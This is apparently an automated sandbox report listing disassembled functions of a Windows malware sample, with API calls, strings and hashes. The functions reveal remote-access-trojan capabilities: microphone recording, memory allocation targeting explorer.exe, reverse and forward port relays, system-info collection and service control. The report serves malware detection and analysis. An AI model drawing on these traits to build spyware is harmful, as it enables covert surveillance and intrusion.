                                                                                                                                                                                                                                            • API String ID: 1913171305-390638927
                                                                                                                                                                                                                                            • Opcode ID: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                                                                            • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                                                                            Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                            • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                                                                                                                                            Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 0040481F
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3658366068-0
                                                                                                                                                                                                                                            • Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                                                                            • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                                                                                                                                                                                                                            Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                            • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                                                                            • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                                                                                                                                            Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 65535$udp
                                                                                                                                                                                                                                            • API String ID: 0-1267037602
                                                                                                                                                                                                                                            • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                            • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                                                                                                                                            Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043947A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439481
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2441525078-0
                                                                                                                                                                                                                                            • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                                                                                                                                                            • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                                                                                                                                            Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                            • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                            • Opcode ID: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                                                                                                                                                                                                            • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                                                                                                                                            Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                                                                                                                                                            • Opcode ID: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                                                                                                                                                                                                            • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                            Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\iGhDjzEiDU.exe), ref: 00406705
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                                                                                                                                                            • Opcode ID: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                                                                                                                                                                                                            • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                                                                                                                                            Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                            • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                                                                                                                                            Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446DEF
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446DFB
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E06
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E11
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E1C
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E27
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E32
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E3D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E48
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E56
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                            • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                                                                                                                                            Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                            • Opcode ID: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                                                                            • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                                                                                                                                            Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DecodePointer
                                                                                                                                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                            • Opcode ID: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                                                                            • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                                                                                                                                            Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                            • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                                                                            • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                                                                                                                                            Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                            • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                                                                            • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                                            Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
